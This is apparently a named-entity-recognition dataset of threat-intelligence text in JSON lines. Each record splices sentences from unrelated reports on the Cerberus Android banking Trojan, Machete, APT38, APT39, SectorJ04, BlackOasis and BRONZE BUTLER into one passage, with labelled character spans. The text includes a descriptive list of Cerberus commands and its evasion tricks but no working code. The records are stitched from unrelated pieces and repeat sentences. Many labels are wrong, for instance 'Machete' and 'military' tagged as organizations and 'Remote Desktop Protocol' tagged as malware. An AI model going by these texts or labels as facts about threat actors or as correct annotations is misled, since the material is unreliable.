{"text": "Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3 Custom activity prefix com.cact.CAct Cerberus - A new banking Trojan from the underworld August 2019 In June 2019 , ThreatFabric analysts found a new Android malware , dubbed \u201c Cerberus \u201d , being rented out on underground forums . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 13, "end": 77, "label": "Indicator"}, {"start": 101, "end": 114, "label": "Indicator"}, {"start": 115, "end": 123, "label": "Malware"}, {"start": 194, "end": 206, "label": "Organization"}, {"start": 228, "end": 235, "label": "System"}, {"start": 255, "end": 263, "label": "Malware"}, {"start": 309, "end": 318, "label": "Organization"}, {"start": 475, "end": 480, "label": "Organization"}, {"start": 513, "end": 522, "label": "Organization"}]}
{"text": "Its authors claim that it was used for private operations for two years preceding the start of the rental . ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations . As detailed in the DOJ complaint , a sample of WHITEOUT malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": [{"start": 108, "end": 112, "label": "Organization"}, {"start": 216, "end": 224, "label": "Organization"}, {"start": 288, "end": 296, "label": "Malware"}, {"start": 297, "end": 304, "label": "Malware"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 384, "end": 388, "label": "Organization"}]}
{"text": "They also state that the code is written from scratch and is not using parts of other existing banking Trojans unlike many other Trojans that are either based completely on the source of another Trojan ( such as the leaked Anubis source code that is now being resold ) or at least borrow parts of other Trojans . The group behind Machete uses effective spearphishing techniques . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": [{"start": 223, "end": 229, "label": "Malware"}, {"start": 330, "end": 337, "label": "Organization"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 431, "end": 436, "label": "Organization"}, {"start": 447, "end": 469, "label": "Organization"}]}
{"text": "After thorough analysis we can confirm that Cerberus was indeed not based on the Anubis source code . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": [{"start": 44, "end": 52, "label": "Malware"}, {"start": 81, "end": 87, "label": "Malware"}, {"start": 121, "end": 130, "label": "Organization"}, {"start": 158, "end": 165, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 356, "end": 361, "label": "Organization"}, {"start": 372, "end": 394, "label": "Organization"}]}
{"text": "One peculiar thing about the actor group behind this banking malware is that they have an \u201c official \u201d twitter account that they use to post promotional content ( even videos ) about the malware . In 2018 Machete reappeared with new code and new features . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": [{"start": 103, "end": 110, "label": "Organization"}, {"start": 205, "end": 212, "label": "Organization"}, {"start": 257, "end": 262, "label": "Organization"}, {"start": 308, "end": 313, "label": "Organization"}, {"start": 324, "end": 346, "label": "Organization"}]}
{"text": "Oddly enough they also use it to make fun of the AV community , sharing detection screenshots from VirusTotal ( thus leaking IoC ) and even engaging in discussions with malware researchers directly The following screenshot shows tweets from their advertisement campaign : That unusual behavior could be explained by the combination of the need for attention and a probable lack of experience . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity .", "spans": [{"start": 99, "end": 109, "label": "Organization"}, {"start": 412, "end": 416, "label": "Organization"}, {"start": 471, "end": 478, "label": "Organization"}, {"start": 553, "end": 561, "label": "Organization"}, {"start": 596, "end": 601, "label": "Organization"}, {"start": 606, "end": 617, "label": "Organization"}, {"start": 684, "end": 702, "label": "Organization"}]}
{"text": "What is sure is that the gap in the Android banking malware rental business left open after the rental of the Anubis 2 and RedAlert 2 Trojans ended provides a good opportunity for the actors behind Cerberus to grow their business quickly . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . APT39 has prioritized the telecommunications sector , with additional targeting of the travel industry and IT firms that support it and the high-tech industry .", "spans": [{"start": 36, "end": 43, "label": "System"}, {"start": 110, "end": 118, "label": "Malware"}, {"start": 123, "end": 133, "label": "Malware"}, {"start": 198, "end": 206, "label": "Malware"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 320, "end": 325, "label": "Organization"}, {"start": 362, "end": 367, "label": "Organization"}, {"start": 388, "end": 413, "label": "Organization"}, {"start": 449, "end": 464, "label": "Organization"}, {"start": 469, "end": 477, "label": "Organization"}, {"start": 502, "end": 520, "label": "Organization"}]}
{"text": "The Android banking Trojan rental business Rental of banking Trojans is not new . Machete was active and constantly working on very effective spearphishing campaigns . This is evidence of shared motivation and intent to target the SWIFT system by the North Korean operators performing the reconnaissance and APT38 which later targeted that organization .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 82, "end": 89, "label": "Organization"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 308, "end": 313, "label": "Organization"}]}
{"text": "It was an existing business model when computer-based banking malware was the only form of banking malware and has shifted to the Android equivalent a few years later . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Although APT38 is distinct from other TEMP.Hermit activity , both groups operate consistently within the interests of the North Korean state .", "spans": [{"start": 130, "end": 137, "label": "System"}, {"start": 185, "end": 192, "label": "Organization"}, {"start": 290, "end": 295, "label": "Organization"}, {"start": 347, "end": 353, "label": "Organization"}]}
{"text": "The life span of Android banking malware is limited to either the will of its author ( s ) to support it or the arrest of those actors . Machete relies on spearphishing to compromise its targets . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea .", "spans": [{"start": 17, "end": 24, "label": "System"}, {"start": 137, "end": 144, "label": "Organization"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 322, "end": 337, "label": "Organization"}, {"start": 348, "end": 359, "label": "Organization"}, {"start": 380, "end": 387, "label": "Organization"}]}
{"text": "This malware-life-cycle has been observed to reoccur every few years , bringing new malware families into light . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": [{"start": 114, "end": 118, "label": "Organization"}, {"start": 160, "end": 168, "label": "Organization"}, {"start": 324, "end": 332, "label": "Malware"}, {"start": 339, "end": 347, "label": "Malware"}, {"start": 374, "end": 379, "label": "Organization"}, {"start": 437, "end": 441, "label": "Organization"}]}
{"text": "Each time a rented malware reaches the end of its life it provides the opportunity for other actors a to take over the malware rental market-share . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . Based on details published in the DOJ complaint against North Korean programmer Park Jin Hyok , we know that APT38 and other cyber operators linked to TEMP.Hermit are associated with Lab 110 , an organization subordinate to or synonymous with the 6th Technical Bureau in North Korea 's Reconnaissance General Bureau ( RGB ) .", "spans": [{"start": 149, "end": 158, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 398, "end": 403, "label": "Organization"}, {"start": 414, "end": 429, "label": "Organization"}, {"start": 440, "end": 451, "label": "Organization"}, {"start": 472, "end": 479, "label": "Organization"}, {"start": 575, "end": 604, "label": "Organization"}, {"start": 607, "end": 610, "label": "Organization"}]}
{"text": "As visible on following chart , the lifespan of many well-known rented Android bankers is usually no more than one or two years . Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . APT38 .", "spans": [{"start": 71, "end": 78, "label": "System"}, {"start": 147, "end": 154, "label": "Organization"}, {"start": 339, "end": 344, "label": "Organization"}]}
{"text": "When the family ceases to exist a new one is already available to fill the void , proving that the demand for such malware is always present and that therefore Cerberus has a good chance to survive . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank .", "spans": [{"start": 160, "end": 168, "label": "Malware"}, {"start": 254, "end": 258, "label": "Organization"}, {"start": 410, "end": 418, "label": "Malware"}, {"start": 425, "end": 433, "label": "Malware"}, {"start": 460, "end": 465, "label": "Organization"}, {"start": 523, "end": 527, "label": "Organization"}]}
{"text": "After the actor behind RedAlert 2 decided to quit the rental business , we observed a surge in Anubis samples in the wild . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete . APT38 's targeting of financial institutions is most likely an effort by the North Korean government to supplement their heavily-sanctioned economy .", "spans": [{"start": 23, "end": 33, "label": "Malware"}, {"start": 95, "end": 101, "label": "Malware"}, {"start": 195, "end": 203, "label": "Organization"}, {"start": 250, "end": 257, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 282, "end": 304, "label": "Organization"}]}
{"text": "After the Anubis actor was allegedly arrested and the source code was leaked there was also huge increase in the number of Anubis samples found in the wild , but the new actors using Anubis have no support or updates . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East .", "spans": [{"start": 10, "end": 16, "label": "Malware"}, {"start": 123, "end": 129, "label": "Malware"}, {"start": 183, "end": 189, "label": "Malware"}, {"start": 219, "end": 226, "label": "Organization"}, {"start": 347, "end": 352, "label": "Organization"}]}
{"text": "Due to this Cerberus will come in handy for actors that want to focus on performing fraud without having to develop and maintain a botnet and C2 infrastructure . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats .", "spans": [{"start": 12, "end": 20, "label": "Malware"}, {"start": 301, "end": 314, "label": "Organization"}, {"start": 358, "end": 363, "label": "Organization"}, {"start": 454, "end": 460, "label": "Organization"}, {"start": 461, "end": 468, "label": "Organization"}]}
{"text": "Analysis of evasion techniques Along with the standard payload and string obfuscation , Cerberus uses a rather interesting technique to prevent analysis of the Trojan . By introducing small changes to their code and infrastructure , the group has bypassed several security products . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns .", "spans": [{"start": 88, "end": 96, "label": "Malware"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 284, "end": 289, "label": "Organization"}, {"start": 306, "end": 346, "label": "Organization"}, {"start": 433, "end": 453, "label": "Organization"}]}
{"text": "Using the device accelerometer sensor it implements a simple pedometer that is used to measure movements of the victim . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": [{"start": 121, "end": 131, "label": "Organization"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}, {"start": 413, "end": 426, "label": "Organization"}, {"start": 487, "end": 508, "label": "Organization"}, {"start": 511, "end": 522, "label": "Organization"}, {"start": 525, "end": 536, "label": "Organization"}, {"start": 543, "end": 553, "label": "Organization"}]}
{"text": "The idea is simple - if the infected device belongs to a real person , sooner or later this person will move around , increasing the step counter . They also download apks secretly and record audios and videos , then upload users\u2019 privacy information to server , causing users\u2019 privacy leakage . Remexi is a basic back door Trojan that allows Cadelle to open a remote shell on the computer and execute commands .", "spans": [{"start": 148, "end": 152, "label": "Malware"}, {"start": 158, "end": 166, "label": "Malware"}, {"start": 172, "end": 180, "label": "Malware"}, {"start": 185, "end": 198, "label": "Malware"}, {"start": 217, "end": 223, "label": "Malware"}, {"start": 296, "end": 302, "label": "Malware"}, {"start": 324, "end": 330, "label": "Malware"}, {"start": 343, "end": 350, "label": "Organization"}]}
{"text": "The Trojan uses this counter to activate the bot - if aforementioned step counter hits the pre-configured threshold it considers running on the device to be safe . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": [{"start": 224, "end": 235, "label": "Organization"}, {"start": 481, "end": 487, "label": "Malware"}, {"start": 509, "end": 515, "label": "Malware"}, {"start": 528, "end": 537, "label": "Organization"}]}
{"text": "This simple measure prevents the Trojan from running and being analyzed in dynamic analysis environments ( sandboxes ) and on the test devices of malware analysts . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group\u2019s hacking . One group , which we call Cadelle , uses Backdoor.Cadelspy , while the other , which we've named Chafer , uses Backdoor.Remexi and Backdoor.Remexi.B .", "spans": [{"start": 170, "end": 176, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 374, "end": 383, "label": "Organization"}, {"start": 428, "end": 435, "label": "Organization"}, {"start": 443, "end": 460, "label": "Malware"}, {"start": 499, "end": 505, "label": "Organization"}, {"start": 513, "end": 528, "label": "Malware"}, {"start": 533, "end": 550, "label": "Malware"}]}
{"text": "The code responsible for this verification is shown in the following snippet : How it works When the malware is first started on the device it will begin by hiding its icon from the application drawer . In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims . APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol ( RDP ) , Secure Shell ( SSH ) , PsExec , RemCom , and xCmdSvc .", "spans": [{"start": 217, "end": 226, "label": "Organization"}, {"start": 282, "end": 300, "label": "Organization"}, {"start": 448, "end": 453, "label": "Organization"}, {"start": 512, "end": 535, "label": "Malware"}, {"start": 538, "end": 541, "label": "Malware"}, {"start": 546, "end": 558, "label": "Malware"}, {"start": 561, "end": 564, "label": "Malware"}, {"start": 569, "end": 575, "label": "Malware"}, {"start": 578, "end": 584, "label": "Malware"}, {"start": 591, "end": 598, "label": "Malware"}]}
{"text": "Then it will ask for the accessibility service privilege as visible in the following screenshot : After the user grants the requested privilege , Cerberus starts to abuse it by granting itself additional permissions , such as permissions needed to send messages and make calls , without requiring any user interaction . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . The APT39 were using an improved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation .", "spans": [{"start": 146, "end": 154, "label": "Malware"}, {"start": 324, "end": 333, "label": "Organization"}, {"start": 528, "end": 533, "label": "Organization"}]}
{"text": "It also disables Play Protect ( Google \u2019 s preinstalled antivirus solution ) to prevent its discovery and deletion in the future . There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": [{"start": 17, "end": 29, "label": "System"}, {"start": 32, "end": 38, "label": "Organization"}, {"start": 167, "end": 178, "label": "Organization"}, {"start": 354, "end": 362, "label": "Vulnerability"}, {"start": 363, "end": 370, "label": "Vulnerability"}, {"start": 496, "end": 507, "label": "Organization"}]}
{"text": "After conveniently granting itself additional privileges and securing its persistence on the device , Cerberus registers the infected device in the botnet and waits for commands from the C2 server while also being ready to perform overlay attacks . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker\u2019s server . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": [{"start": 102, "end": 110, "label": "Malware"}, {"start": 375, "end": 385, "label": "Organization"}, {"start": 425, "end": 441, "label": "Organization"}, {"start": 511, "end": 519, "label": "Vulnerability"}, {"start": 520, "end": 527, "label": "Vulnerability"}, {"start": 653, "end": 664, "label": "Organization"}]}
{"text": "The commands supported by the analyzed version of the Cerberus bot are listed below . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" .", "spans": [{"start": 54, "end": 62, "label": "Malware"}, {"start": 93, "end": 102, "label": "Organization"}, {"start": 240, "end": 250, "label": "Organization"}]}
{"text": "As can be seen , the possibilities offered by the bot are pretty common . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 78, "end": 87, "label": "Organization"}, {"start": 180, "end": 194, "label": "Malware"}, {"start": 195, "end": 204, "label": "Malware"}, {"start": 262, "end": 270, "label": "Organization"}, {"start": 335, "end": 344, "label": "Organization"}, {"start": 355, "end": 371, "label": "Organization"}, {"start": 389, "end": 407, "label": "System"}, {"start": 408, "end": 416, "label": "Vulnerability"}, {"start": 433, "end": 446, "label": "Vulnerability"}, {"start": 493, "end": 499, "label": "Malware"}]}
{"text": "Command Description push Shows a push notification . The SectorJ04 group\u2019s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their areas of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": [{"start": 57, "end": 66, "label": "Organization"}, {"start": 100, "end": 122, "label": "Organization"}, {"start": 301, "end": 308, "label": "Organization"}, {"start": 311, "end": 325, "label": "Organization"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 336, "end": 342, "label": "Organization"}, {"start": 347, "end": 360, "label": "Organization"}, {"start": 374, "end": 383, "label": "Organization"}, {"start": 417, "end": 435, "label": "System"}, {"start": 436, "end": 444, "label": "Vulnerability"}, {"start": 461, "end": 474, "label": "Vulnerability"}, {"start": 521, "end": 527, "label": "Malware"}]}
{"text": "Clicking on thenotification will result in launching a specified app startApp Starts the specified application getInstallApps Gets the list of installedapplications on the infected device getContacts Gets the contact names and phone numbers from the addressbook on the infected device deleteApplication Triggers the deletion of the specified application forwardCall Enables call forwarding to the specified number sendSms Sends a text message with specified text from the infecteddevice to the specified phone number startInject Triggers the overlay attack against the specified application startUssd The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking . BlackOasis ' interests span a wide gamut of figures involved in Middle Eastern politics .", "spans": [{"start": 605, "end": 614, "label": "Organization"}, {"start": 654, "end": 664, "label": "System"}, {"start": 669, "end": 683, "label": "System"}, {"start": 700, "end": 710, "label": "Organization"}, {"start": 779, "end": 787, "label": "Organization"}]}
{"text": "Calls the specified USSD code openUrl Opens the specified URL in the WebView getSMS Gets all text messages from the infected device killMe Triggers the kill switch for the bot updateModule Updates the payload module Cerberus features Cerberus malware has the same capabilities as most other Android banking Trojans such as the use of overlay attacks , SMS control and contact list harvesting . SectorJ04 also used the Remote Manipulator System (RMS) RAT , a legitimate remote management software created in Russia . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japanese organizations such as government agencies ( including defense ) as well as those in biotechnology , electronics manufacturing , and industrial chemistry .", "spans": [{"start": 216, "end": 224, "label": "Malware"}, {"start": 234, "end": 242, "label": "Malware"}, {"start": 291, "end": 298, "label": "System"}, {"start": 394, "end": 403, "label": "Organization"}, {"start": 418, "end": 443, "label": "System"}, {"start": 516, "end": 529, "label": "Organization"}, {"start": 546, "end": 559, "label": "Organization"}, {"start": 564, "end": 568, "label": "Organization"}, {"start": 644, "end": 663, "label": "Organization"}, {"start": 676, "end": 683, "label": "Organization"}, {"start": 706, "end": 719, "label": "Organization"}, {"start": 722, "end": 747, "label": "Organization"}, {"start": 754, "end": 774, "label": "Organization"}]}
{"text": "The Trojan can also leverage keylogging to broaden the attack scope . Backdoors are installed in infected systems and SectorJ04 also distributed email stealers , botnet malware and ransomware through those backdoors . REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry .", "spans": [{"start": 118, "end": 127, "label": "Organization"}, {"start": 206, "end": 215, "label": "System"}, {"start": 218, "end": 231, "label": "Organization"}, {"start": 248, "end": 261, "label": "Organization"}, {"start": 266, "end": 270, "label": "Organization"}, {"start": 329, "end": 348, "label": "Organization"}, {"start": 369, "end": 382, "label": "Organization"}, {"start": 385, "end": 410, "label": "Organization"}, {"start": 417, "end": 437, "label": "Organization"}]}
{"text": "Overall , Cerberus has a pretty common feature list and although the malware seems to have been written from scratch there does not seem to be any innovative functionality at this time . Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 187, "end": 195, "label": "Malware"}, {"start": 311, "end": 324, "label": "Organization"}, {"start": 405, "end": 420, "label": "Indicator"}]}
{"text": "For example , some of the more advanced banking Trojans now offer features such as a back-connect proxy , screen-streaming and even remote control . SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker\u2019s server . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 \u2014 at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": [{"start": 149, "end": 158, "label": "Organization"}, {"start": 216, "end": 223, "label": "System"}, {"start": 228, "end": 239, "label": "System"}, {"start": 385, "end": 395, "label": "Organization"}, {"start": 415, "end": 428, "label": "Organization"}, {"start": 539, "end": 554, "label": "Indicator"}]}
{"text": "Cerberus embeds the following set of features that allows itself to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( Local injects obtained from C2 ) Keylogging SMS harvesting : SMS listing SMS harvesting : SMS forwarding Device info collection Contact list collection Application listing Location collection Overlaying : Targets list update SMS : Sending Calls : USSD request making Calls : Call forwarding Remote actions : App installing Remote actions : App starting Remote actions : App removal Remote actions : Showing arbitrary web pages Remote actions : Screen-locking Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia . Secureworks\u00ae incident responders and Counter Threat Unit\u2122 ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 621, "end": 630, "label": "Organization"}, {"start": 804, "end": 816, "label": "Organization"}, {"start": 864, "end": 867, "label": "Organization"}, {"start": 926, "end": 939, "label": "Organization"}, {"start": 956, "end": 960, "label": "Organization"}]}
{"text": "Notifications : Push notifications C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Architecture : Modular Overlay attack Most Android banking Trojans use overlay attacks to trick the victim into providing their personal information ( such as but not limited to : credit card information , banking credentials , mail credentials ) and Cerberus is no exception . The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms .", "spans": [{"start": 433, "end": 441, "label": "Malware"}, {"start": 464, "end": 477, "label": "Malware"}, {"start": 478, "end": 497, "label": "Malware"}, {"start": 752, "end": 757, "label": "Organization"}, {"start": 910, "end": 934, "label": "Organization"}]}
{"text": "In this particular case , the bot abuses the accessibility service privilege to obtain the package name of the foreground application and determine whether or not to show a phishing overlay window , as shown in the following code snippet : Targets Some examples of phishing overlays are shown below . A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 . BRONZE BUTLER has used a broad range of publicly available ( Mimikatz and gsecdump ) and proprietary ( Daserf and Datper ) tools .", "spans": [{"start": 331, "end": 338, "label": "System"}, {"start": 364, "end": 375, "label": "System"}, {"start": 403, "end": 412, "label": "Organization"}, {"start": 415, "end": 428, "label": "Organization"}, {"start": 476, "end": 484, "label": "Malware"}, {"start": 489, "end": 497, "label": "Malware"}, {"start": 518, "end": 524, "label": "Malware"}, {"start": 529, "end": 535, "label": "Malware"}]}
{"text": "They exist in two types : the credentials stealers ( first 2 screenshots ) and the credit card grabbers ( last screenshot ) . But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email . BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment .", "spans": [{"start": 141, "end": 150, "label": "Organization"}, {"start": 213, "end": 226, "label": "Organization"}, {"start": 275, "end": 281, "label": "System"}]}
{"text": "The only active target list observed in the wild is available in the appendix and contains a total of 30 unique targets . The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": [{"start": 148, "end": 157, "label": "Organization"}, {"start": 257, "end": 270, "label": "Organization"}, {"start": 326, "end": 334, "label": "Vulnerability"}]}
{"text": "It is interesting to observe that the actual target list contains : 7 French banking apps 7 U.S. banking apps 1 Japanese banking app 15 non-banking apps This uncommon target list might either be the result of specific customer demand , or due to some actors having partially reused an existing target list . Prior to 2019 , the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware , such as Locky and GlobeImporter , along with its banking Trojan , on its victims computers . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": [{"start": 328, "end": 337, "label": "Organization"}, {"start": 410, "end": 422, "label": "System"}, {"start": 467, "end": 472, "label": "System"}, {"start": 477, "end": 490, "label": "System"}, {"start": 508, "end": 522, "label": "System"}, {"start": 617, "end": 625, "label": "Vulnerability"}]}
{"text": "Conclusion Although not yet mature enough to provide the equivalent of a full-blown set of Android banking malware features ( such as RAT , RAT with ATS ( Automated Transaction Script ) , back-connect proxy , media streaming ) , or providing an exhaustive target list , Cerberus should not be taken lightly . In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": [{"start": 91, "end": 98, "label": "System"}, {"start": 270, "end": 278, "label": "Malware"}, {"start": 335, "end": 346, "label": "Organization"}, {"start": 517, "end": 530, "label": "Organization"}, {"start": 549, "end": 555, "label": "System"}, {"start": 561, "end": 566, "label": "System"}, {"start": 613, "end": 619, "label": "Malware"}, {"start": 620, "end": 627, "label": "Malware"}, {"start": 653, "end": 658, "label": "System"}, {"start": 659, "end": 667, "label": "Vulnerability"}]}
{"text": "Due to the current absence of maintained and supported Android banking Malware-as-a-Service in the underground community , there is a certainly demand for a new service . The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": [{"start": 55, "end": 62, "label": "Malware"}, {"start": 175, "end": 184, "label": "Organization"}, {"start": 398, "end": 404, "label": "System"}, {"start": 410, "end": 415, "label": "System"}, {"start": 462, "end": 468, "label": "Malware"}, {"start": 469, "end": 476, "label": "Malware"}, {"start": 502, "end": 507, "label": "System"}, {"start": 508, "end": 516, "label": "Vulnerability"}]}
{"text": "Cerberus is already capable to fulfill this demand . In June , SectorJ04 group conducted hacking using spam emails written in various languages , including English , Arabic , Korean and Italian , and the emails were written with various contents , including remittance card , invoice and tax invoice . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 63, "end": 72, "label": "Organization"}, {"start": 302, "end": 315, "label": "Organization"}, {"start": 352, "end": 360, "label": "Malware"}, {"start": 365, "end": 368, "label": "Malware"}]}
{"text": "In addition to the feature base it already possesses and the money that can be made from the rental , it could evolve to compete with the mightiest Android banking Trojans . Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing . While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": [{"start": 148, "end": 155, "label": "System"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 314, "end": 325, "label": "Organization"}, {"start": 330, "end": 348, "label": "Organization"}, {"start": 351, "end": 364, "label": "Organization"}, {"start": 377, "end": 390, "label": "Organization"}, {"start": 432, "end": 443, "label": "Organization"}, {"start": 455, "end": 468, "label": "Organization"}, {"start": 535, "end": 548, "label": "Vulnerability"}]}
